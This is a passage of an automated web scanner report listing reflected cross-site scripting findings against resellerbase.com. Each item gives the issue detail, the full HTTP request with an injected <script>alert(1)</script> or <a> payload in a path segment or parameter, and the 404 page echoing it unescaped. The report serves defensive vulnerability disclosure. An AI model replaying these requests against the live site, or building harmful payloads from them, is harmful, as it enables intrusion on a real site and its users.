X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scriptsd8fb2<script>alert(1)</script>bb34a93f238/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5332. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1e7c1<script>alert(1)</script>14c565a88c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes1e7c1<script>alert(1)</script>14c565a88c0/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes1e7c1<script>alert(1)</script>14c565a88c0/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5333. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9e598<script>alert(1)</script>ca4c4d3c0e1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos9e598<script>alert(1)</script>ca4c4d3c0e1/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos9e598<script>alert(1)</script>ca4c4d3c0e1/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5334. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 401fd<script>alert(1)</script>32972e0cdd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images401fd<script>alert(1)</script>32972e0cdd/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images401fd<script>alert(1)</script>32972e0cdd/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5335. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b81bd<script>alert(1)</script>5c6035e9a59 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/reviewb81bd<script>alert(1)</script>5c6035e9a59/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/reviewb81bd<script>alert(1)</script>5c6035e9a59/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5336. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload be498<script>alert(1)</script>c9ebadf3036 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/review/search.phpbe498<script>alert(1)</script>c9ebadf3036?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/review/search.phpbe498<script>alert(1)</script>c9ebadf3036?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5337. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d8365<a>7174488aed2 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Searchd8365<a>7174488aed2&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Searchd8365<a>7174488aed2&opt=2 was not found on this server.</p>
...[SNIP]...

2.5338. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 89ae0<a>61e72d6e6c7 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/images/review/search.php?keyword=search...89ae0<a>61e72d6e6c7&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/review/search.php?keyword=search...89ae0<a>61e72d6e6c7&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5339. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c3582<script>alert(1)</script>606241ba109 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&c3582<script>alert(1)</script>606241ba109=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&c3582<script>alert(1)</script>606241ba109=1 was not found on this server.</p>
...[SNIP]...

2.5340. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7070b<a>c20dbd17c52 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=27070b<a>c20dbd17c52 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=27070b<a>c20dbd17c52 was not found on this server.</p>
...[SNIP]...

2.5341. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fd151<script>alert(1)</script>655c68e9b9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicefd151<script>alert(1)</script>655c68e9b9d/software-scripts/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicefd151<script>alert(1)</script>655c68e9b9d/software-scripts/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5342. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f06f9<script>alert(1)</script>76293082351 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scriptsf06f9<script>alert(1)</script>76293082351/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scriptsf06f9<script>alert(1)</script>76293082351/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5343. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 225b2<script>alert(1)</script>94868ef74b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes225b2<script>alert(1)</script>94868ef74b0/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes225b2<script>alert(1)</script>94868ef74b0/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5344. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f1411<script>alert(1)</script>282f7b514e0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmosf1411<script>alert(1)</script>282f7b514e0/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmosf1411<script>alert(1)</script>282f7b514e0/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5345. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b5fb3<script>alert(1)</script>a2c0dc27408 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/imagesb5fb3<script>alert(1)</script>a2c0dc27408/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/imagesb5fb3<script>alert(1)</script>a2c0dc27408/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5346. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9a5a2<script>alert(1)</script>f5363e39275 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/search.php9a5a2<script>alert(1)</script>f5363e39275?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/search.php9a5a2<script>alert(1)</script>f5363e39275?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5347. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 70218<a>63dbae0a5c8 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/images/search.php?keyword=search...&Submit3=Search70218<a>63dbae0a5c8&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/search.php?keyword=search...&Submit3=Search70218<a>63dbae0a5c8&opt=2 was not found on this server.</p>
...[SNIP]...

2.5348. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ff1db<a>e4669b8c73d was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/images/search.php?keyword=search...ff1db<a>e4669b8c73d&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

